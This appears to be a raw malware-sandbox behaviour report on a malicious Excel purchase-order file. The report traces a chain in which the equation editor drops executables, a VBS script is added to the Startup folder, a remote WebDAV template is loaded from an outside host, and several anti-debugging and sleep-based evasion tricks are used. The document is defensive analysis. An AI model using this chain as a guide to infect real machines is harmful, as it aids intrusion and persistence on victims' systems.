Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ucrtbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: PO-00006799868.xls Static file information: File size 1094656 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: name.exe, 0000000B.00000003.456762758.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.456458647.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485897066.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485739921.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp
Source: 68730000.0.dr Initial sample: OLE indicators vbamacros = False
Source: PO-00006799868.xls Initial sample: OLE indicators encrypted = True
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022C104 LoadLibraryA,GetProcAddress, 10_2_0022C104
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0065FA2C push 00000045h; ret 9_2_0065FA33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0066C301 pushad ; ret 9_2_0066C339
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0066C789 push esp; ret 9_2_0066C795
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE20A push esi; retf 10_3_02ADE20D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE6C2 push 7E000BC3h; ret 10_3_02ADE6D1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE7F2 push cs; ret 10_3_02ADE8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE4C8 push ss; iretd 10_3_02ADE581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE596 push ss; iretd 10_3_02ADE581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE8E8 push cs; ret 10_3_02ADE8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE8E4 pushfd ; retn 000Bh 10_3_02ADE8E5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE8F4 push eax; retn 000Bh 10_3_02ADE8F5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ADE900 push ds; retn 000Bh 10_3_02ADE945
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A5B988 push eax; retn 0040h 10_3_02A5B999
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A77EC5 push ecx; ret 10_3_02A77ED8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001BC590 push eax; retn 001Bh 10_2_001BC599
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001D8AC5 push ecx; ret 10_2_001D8AD8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01288AC5 push ecx; ret 11_2_01288AD8

Persistence and Installation Behavior
barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRoot Jump to behavior
Office drops RTF file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 96632497.doc.4.dr Jump to dropped file
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Roaming\taskhostw.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_001B4A35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01264A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_01264A35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012E53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_012E53DF
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001D3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_001D3307
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PO-00006799868.xls Stream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: PO-00006799868.xls Stream path 'Workbook' entropy: 7.9987777032 (max. 8.0)
Source: 68730000.0.dr Stream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: 68730000.0.dr Stream path 'Workbook' entropy: 7.99889335374 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: B3244
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 565 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 9412 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\taskhostw.exe API coverage: 6.9 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3192 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464 Thread sleep count: 565 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464 Thread sleep time: -1695000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2120 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464 Thread sleep count: 9412 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2464 Thread sleep time: -28236000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2180 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0021449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021C75D FindFirstFileW,FindClose, 10_2_0021C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0021C7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose, 11_2_012C449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CC75D FindFirstFileW,FindClose, 11_2_012CC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_012CC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_012CF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_012CF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_012CF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_012C3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_012C3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_012CBD48
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_001B4AFE
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022401F BlockInput, 10_2_0022401F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 10_2_001B3B4C
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01295BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_01295BFC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022C104 LoadLibraryA,GetProcAddress, 10_2_0022C104
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_000B34B0 mov eax, dword ptr fs:[00000030h] 11_2_000B34B0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_000B3510 mov eax, dword ptr fs:[00000030h] 11_2_000B3510
